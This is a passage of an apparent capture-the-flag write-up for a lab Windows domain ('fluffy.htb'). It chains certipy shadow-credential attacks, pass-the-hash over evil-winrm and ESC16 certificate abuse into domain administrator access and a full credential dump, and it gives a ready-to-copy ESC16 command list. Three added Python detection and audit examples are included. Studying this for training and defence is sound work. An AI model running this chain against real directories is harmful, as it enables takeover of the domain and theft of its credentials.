[*] Successfully added Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

We obtain it the same way for the ldap_svc user.

❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ldap_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca'
[*] Adding Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37

Finally for winrm_svc.

❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account winrm_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '8e224404-6043-2547-3758-c02d8e2ae20f'
[*] Adding Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
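
The three certipy runs above leave a recognisable trace on the domain controller: each one adds a value to the target account's msDS-KeyCredentialLink attribute, authenticates, and then restores the old key credentials (the "Restoring the old Key Credentials" lines). With "Audit Directory Service Changes" enabled and a SACL on that attribute, every such write is recorded as Security event 5136. The following is an added detection example, not part of the writeup: it runs over constructed records carrying the 5136 fields (SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType, where %%14674 and %%14675 are the documented "Value Added" and "Value Deleted" codes) and alerts on a key credential added to an account by a different principal, and on an add followed by a delete on the same object by the same subject inside a short window. The `WS01` computer account and the `trusted_writers` allowlist are assumptions for the sample, not objects from the box.

```python
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

KEYCRED_ATTR = "msDS-KeyCredentialLink"
OP_VALUE_ADDED = "%%14674"    # event 5136 OperationType: Value Added
OP_VALUE_DELETED = "%%14675"  # event 5136 OperationType: Value Deleted

# Constructed records carrying the Security event 5136 fields this detector
# reads. A real pipeline would pull them from the DC's Security log; 5136 is
# only emitted when "Audit Directory Service Changes" is on and the attribute
# carries a write SACL.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 5136, "TimeCreated": "2025-05-25T11:30:00", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": OP_VALUE_ADDED},
    {"EventID": 5136, "TimeCreated": "2025-05-25T11:30:09", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": OP_VALUE_DELETED},
    # constructed: a computer account registering its own key (expected behaviour)
    {"EventID": 5136, "TimeCreated": "2025-05-25T11:45:00", "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=fluffy,DC=htb", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": OP_VALUE_ADDED},
    # an unrelated attribute write and an unrelated event, both ignored
    {"EventID": 5136, "TimeCreated": "2025-05-25T11:50:00", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": OP_VALUE_ADDED},
    {"EventID": 4624, "TimeCreated": "2025-05-25T11:51:00", "SubjectUserName": "p.agila"},
]


def object_cn(dn: str) -> str:
    """First RDN value of a DN: 'CN=ca_svc,CN=Users,...' -> 'ca_svc'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def is_self_write(ev: Dict) -> bool:
    """True when a principal writes its own object (trailing '$' of computer accounts ignored)."""
    subject = ev["SubjectUserName"].rstrip("$").lower()
    return subject == object_cn(ev["ObjectDN"]).rstrip("$").lower()


def keycred_writes(events: Iterable[Dict]) -> List[Dict]:
    """The 5136 records that touch msDS-KeyCredentialLink, oldest first."""
    hits = [e for e in events
            if e.get("EventID") == 5136 and e.get("AttributeLDAPDisplayName") == KEYCRED_ATTR]
    return sorted(hits, key=lambda e: datetime.fromisoformat(e["TimeCreated"]))


def detect_shadow_credentials(events: Iterable[Dict], trusted_writers: Iterable[str] = (),
                              restore_window: timedelta = timedelta(minutes=5)
                              ) -> List[Tuple[str, str, str]]:
    """Return (reason, subject, object DN) alerts for suspicious key credential writes.

    Self-registration and writers in trusted_writers (e.g. a provisioning
    service account; assumption) are treated as expected. Everything else
    that adds a key credential alerts, and an add followed within
    restore_window by a delete on the same object by the same subject is
    reported separately as the add/authenticate/restore pattern.
    """
    trusted = {w.lower() for w in trusted_writers}
    writes = keycred_writes(events)
    alerts: List[Tuple[str, str, str]] = []
    for i, ev in enumerate(writes):
        if ev["OperationType"] != OP_VALUE_ADDED:
            continue
        subject, dn = ev["SubjectUserName"], ev["ObjectDN"]
        if not is_self_write(ev) and subject.lower() not in trusted:
            alerts.append(("keycredentiallink-added-by-other-principal", subject, dn))
        added_at = datetime.fromisoformat(ev["TimeCreated"])
        for later in writes[i + 1:]:
            if datetime.fromisoformat(later["TimeCreated"]) - added_at > restore_window:
                break  # writes are sorted, nothing later can be inside the window
            if (later["ObjectDN"] == dn and later["SubjectUserName"] == subject
                    and later["OperationType"] == OP_VALUE_DELETED):
                alerts.append(("keycredentiallink-add-then-restore", subject, dn))
                break
    return alerts


if __name__ == "__main__":
    for reason, subject, dn in detect_shadow_credentials(SAMPLE_EVENTS):
        print(f"{reason}: {subject} -> {dn}")
```

On the sample the p.agila write to ca_svc produces both alerts while the computer's self-registration produces none; the same logic applied to real 5136 data would have flagged all three runs above, since none of ca_svc, ldap_svc or winrm_svc wrote its own attribute.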

User - winrm_svc

winrm_svc can access the WinRM service; we use the hash with evil-winrm, gaining access to the machine and the user.txt flag.

❯ evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> dir ../Desktop


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/25/2025   8:18 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cat ../Desktop/user.txt
14a51cbc5bfc0388a9179b991f265390
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>

Privesc

Using the ca_svc hash we run certipy searching for vulnerable templates. It reports that the Certificate Authority is vulnerable to ESC16.

❯ certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -no-pass -dc-ip 10.10.11.69 -ns 10.10.11.69 -target dc01.fluffy.htb -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates
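The ESC16 finding above rests on one CA setting: the szOID_NTDS_CA_SECURITY_EXT OID (1.3.6.1.4.1.311.25.2) appearing under "Disabled Extensions". As an added example (not the write-up's own code), the following parser reads a constructed excerpt of that certipy block, flags the precondition, and lists the ManageCa principals who would have to re-enable the extension.

```python
SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"  # szOID_NTDS_CA_SECURITY_EXT

# Constructed excerpt modeled on the certipy output above (not a real capture).
SAMPLE = """\
Certificate Authorities
    CA Name                             : fluffy-DC01-CA
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\\Domain Admins
                                          FLUFFY.HTB\\Enterprise Admins
        Enroll                          : FLUFFY.HTB\\Cert Publishers
    [!] Vulnerabilities
"""

def parse_ca_block(text):
    """Return (fields, rights): 'key : value' pairs and the Access Rights
    table as right -> list of principals (wrapped lines are continuations)."""
    fields, rights = {}, {}
    current_right, in_rights = None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Access Rights":
            in_rights = True
            continue
        if line.startswith("["):  # '[!] Vulnerabilities' ends the table
            in_rights = False
            continue
        if ":" in line:
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if in_rights:
                current_right, rights[key] = key, [value]
            else:
                fields[key] = value
        elif in_rights and current_right:
            rights[current_right].append(line)  # extra principal on a wrapped line
    return fields, rights

def esc16_findings(text):
    """Return ESC16 findings; an empty list means the SID extension is enabled."""
    fields, rights = parse_ca_block(text)
    disabled = {o.strip() for o in fields.get("Disabled Extensions", "").split(",")}
    if SECURITY_EXT_OID not in disabled:
        return []
    return [f"ESC16 on {fields.get('CA Name', '?')}: {SECURITY_EXT_OID} disabled; "
            f"re-enable it via DisableExtensionList (ManageCa: {rights.get('ManageCa')})"]
```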

ESC16 Exploit

We exploit ESC16, starting by verifying the prerequisites. The attacking account must have GenericWrite over the victim, and the victim must be able to enroll in any template on the vulnerable CA. This holds here, since winrm_svc or ldap_svc have permissions over ca_svc, which is the account with access to the vulnerable template.

We begin the exploitation by changing the UPN of the ca_svc user to administrator using the winrm_svc credentials.

❯ certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : ca_svc@fluffy.htb
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-29T15:03:30+00:00
❯ certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

With that done, we request a certificate from the User template as ca_svc.

❯ certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 19
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

We reset the ca_svc UPN to its original value.

❯ certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

Finally we authenticate with the requested certificate, obtaining the administrator hash.

❯ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

List of commands for the ESC16 attack.

# check upn of victim user GenericWrite
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -user 'ca_svc' read

# update upn of the victim
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update

# request certificate as the victim to any template on the CA vulnerable
certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

# revert upn of the victim
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

# authenticate as the victim with the requested template
certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
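The whole chain hinges on ca_svc briefly carrying the UPN "administrator" (no suffix, prefix not matching its sAMAccountName, colliding with the real account). As an added example (not the write-up's own code), this audit flags exactly that pattern over a constructed snapshot of user objects such as a periodic LDAP export would give a defender; DOMAIN, USERS and the function names are assumptions for the example.

```python
DOMAIN = "fluffy.htb"

# Constructed snapshot (sAMAccountName -> userPrincipalName) mirroring the
# 'certipy account read' attributes above, with the tampered ca_svc UPN.
USERS = {
    "administrator": "administrator@fluffy.htb",
    "ca_svc": "administrator",  # rewritten in the exploit step above
    "winrm_svc": "winrm_svc@fluffy.htb",
    "p.agila": "p.agila@fluffy.htb",
}

def split_upn(upn):
    """Return (prefix, suffix) lowercased; suffix is '' when there is no '@'."""
    prefix, _, suffix = upn.partition("@")
    return prefix.lower(), suffix.lower()

def audit_upns(users, domain=DOMAIN):
    """Return (sAMAccountName, reason) pairs for UPNs that look tampered:
    missing or foreign suffix, prefix != sAMAccountName, or a prefix that
    collides with another account (the ESC16 pattern: ca_svc -> administrator)."""
    findings, owners = [], {}
    for sam, upn in users.items():
        prefix, suffix = split_upn(upn)
        owners.setdefault(prefix, set()).add(sam.lower())
        if not suffix:
            findings.append((sam, "UPN has no domain suffix"))
        elif suffix != domain.lower():
            findings.append((sam, f"UPN suffix {suffix!r} is not {domain}"))
        if prefix != sam.lower():
            findings.append((sam, f"UPN prefix {prefix!r} differs from sAMAccountName"))
    for prefix, sams in owners.items():
        if len(sams) > 1:  # two accounts would map to the same certificate identity
            for sam in sorted(sams):
                others = sorted(sams - {sam})
                findings.append((sam, f"UPN prefix {prefix!r} shared with {others}"))
    return findings
```

Because the attacker reverts the UPN right after enrolling, run the audit against directory change history (or LDAP modification events) rather than only the current state.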

Shell

We use the administrator hash over WinRM, obtaining a shell and the root.txt flag.

❯ evil-winrm -i fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
d7c989c36f239695ee0649aa6c6e49d2
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Dump Hashes

We dump the hashes with impacket-secretsdump.

❯ impacket-secretsdump administrator@fluffy.htb -hashes :8da83a3fa618b6e3a00e93f676c92a6e -use-vss
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xffa5608d6bd2811aaabfd47fbc3d1c37
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
FLUFFY\DC01$:aes256-cts-hmac-sha1-96:34b5e3f67441a6c19509cb966b9e5392e48257ff5058e7a22a4282fe822a5751
FLUFFY\DC01$:aes128-cts-hmac-sha1-96:19a1dd430a92c3568f04814342d8e486
FLUFFY\DC01$:des-cbc-md5:ec13a85edf688a85
FLUFFY\DC01$:plain_password_hex:c051a2b56dd8422b09fcc441e1bfaf0a5f0fe659a1634184e7dd6849da03747cad2050bd71e55da3e979245cb872106b52367ac876380294db669d308655c9f8f72b71ea10b4cc90199e1a059645dad4e77b3b982de60b7a59af8d4261b0077be1890caf3aa7e6290dcbc0c443f81bc6124cdef4e26472b3a5c8bcd8fc666b876709496e61a026559328d19db45819e69695bbafda526692513d2457e98de68b9473b08ed96e1d50b06dc53c6e58a595feebd6568a2a75811a5456336f40ede98c2996a0360a618d492e112a905235641126ad3234d68a920c0cd9439b4bd7203d28a1ad4d2ebdbe484d47836735b4cb
FLUFFY\DC01$:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
[*] DefaultPassword 
p.agila:prometheusx-303
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x50f64bc1be95364da6cc33deca194d9b827c4846
dpapi_userkey:0xe410025a604608d81064e274f6eb46cba458ebd5
[*] NL$KM 
 0000   0B 4A EC B4 04 86 59 99  A3 11 64 45 1D F8 EF E0   .J....Y...dE....
 0010   74 E0 BB 5A 07 EA AD B9  63 4D AB 03 B5 0F 69 3D   t..Z....cM....i=
 0020   C5 C2 F8 4E F0 EC EC B6  28 A2 59 AB BA 2B F0 A2   ...N....(.Y..+..
 0030   57 89 D1 62 FA 69 04 2A  31 57 54 5A FB B0 2A 18   W..b.i.*1WTZ..*.
NL$KM:0b4aecb404865999a31164451df8efe074e0bb5a07eaadb9634dab03b50f693dc5c2f84ef0ececb628a259abba2bf0a25789d162fa69042a3157545afbb02a18
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 8ca25a3f676741c63bb944b06ded3893
[*] Reading and decrypting hashes from \\fluffy.htb\ADMIN$\Temp\ktuJptUh.tmp 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7a9950c26fe9c3cbfe5b9ceaa21c9bfd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c3442d41139f13bd02f0695d56362b9:::
fluffy.htb\ca_svc:1103:aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8:::
fluffy.htb\ldap_svc:1104:aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37:::
fluffy.htb\p.agila:1601:aad3b435b51404eeaad3b435b51404ee:a51fede5012110e9a65bd3f470513867:::
fluffy.htb\winrm_svc:1603:aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767:::
fluffy.htb\j.coffey:1605:aad3b435b51404eeaad3b435b51404ee:dff933046fa0943ac993d35a054235e3:::
fluffy.htb\j.fleischman:1606:aad3b435b51404eeaad3b435b51404ee:10842ead8d1d060a2de1394e4b2ea460:::
[*] Kerberos keys from \\fluffy.htb\ADMIN$\Temp\ktuJptUh.tmp 
Administrator:aes256-cts-hmac-sha1-96:d79b7fb71c2fc3c913fb59a3ac7c19c16c6637783c2a3bafe87723e90e99d2d2
Administrator:aes128-cts-hmac-sha1-96:72330cfd187d8ced05afda3d9a9fefea
Administrator:des-cbc-md5:403ec8b9e6b0d031
DC01$:aes256-cts-hmac-sha1-96:34b5e3f67441a6c19509cb966b9e5392e48257ff5058e7a22a4282fe822a5751
DC01$:aes128-cts-hmac-sha1-96:19a1dd430a92c3568f04814342d8e486
DC01$:des-cbc-md5:b94a2fb0ef98614a
krbtgt:aes256-cts-hmac-sha1-96:bce1e1f6f529302071ea37bafc49764526db568a7808a0ed55313eeb86dce183
krbtgt:aes128-cts-hmac-sha1-96:c85fbebccd28b736047f75a96714374b
krbtgt:des-cbc-md5:b558703707f27a62
fluffy.htb\ca_svc:aes256-cts-hmac-sha1-96:8dad02a4db02f3ffb213195a04743c404aed41c128b2953160c4cbe04d71c51b
fluffy.htb\ca_svc:aes128-cts-hmac-sha1-96:0ea0cae5076362a19f909b53d96217eb
fluffy.htb\ca_svc:des-cbc-md5:89c8f802b6dcd3a1
fluffy.htb\ldap_svc:aes256-cts-hmac-sha1-96:f6bf787afe770c155767769caf708f9a38a877da0bf5a248b7f35eacec44395c
fluffy.htb\ldap_svc:aes128-cts-hmac-sha1-96:192716f566e02696ff9bb68eb7b31635
fluffy.htb\ldap_svc:des-cbc-md5:07b93b58ba3b6b58
fluffy.htb\p.agila:aes256-cts-hmac-sha1-96:d406a2be082d99748731aa06db12082be1ba82b785e9034b4c8c9bbee6ea9c81
fluffy.htb\p.agila:aes128-cts-hmac-sha1-96:3432d6e28d562b56b79724e8dd140902
fluffy.htb\p.agila:des-cbc-md5:94974cb649986192
fluffy.htb\winrm_svc:aes256-cts-hmac-sha1-96:d39116a2e57c08e6a11efd0d8bb095057757cbe33ef8071b5a2941ae7ffd6361
fluffy.htb\winrm_svc:aes128-cts-hmac-sha1-96:49f7be01bda911e219aa563d2b8b6c2b
fluffy.htb\winrm_svc:des-cbc-md5:5d7320d6866162bf
fluffy.htb\j.coffey:aes256-cts-hmac-sha1-96:6a75e552c557c6d62998edc7886e71a6c00194fffe5a745551bda945afce7bcc
fluffy.htb\j.coffey:aes128-cts-hmac-sha1-96:4ce6fb38d69657c43b83f77cfa57bbde
fluffy.htb\j.coffey:des-cbc-md5:83b685084f34ea04
fluffy.htb\j.fleischman:aes256-cts-hmac-sha1-96:e63c60e41f7f45687527fb9042d668272b7695c6478d3fa11f4c729fa7349b6b
fluffy.htb\j.fleischman:aes128-cts-hmac-sha1-96:dc9450b2c85e8c35f2be9e9fb9b2bbe1
fluffy.htb\j.fleischman:des-cbc-md5:760e31b00d20cd9e
[*] Cleaning up... 

Dany Sucuc
WRITTEN BY
sckull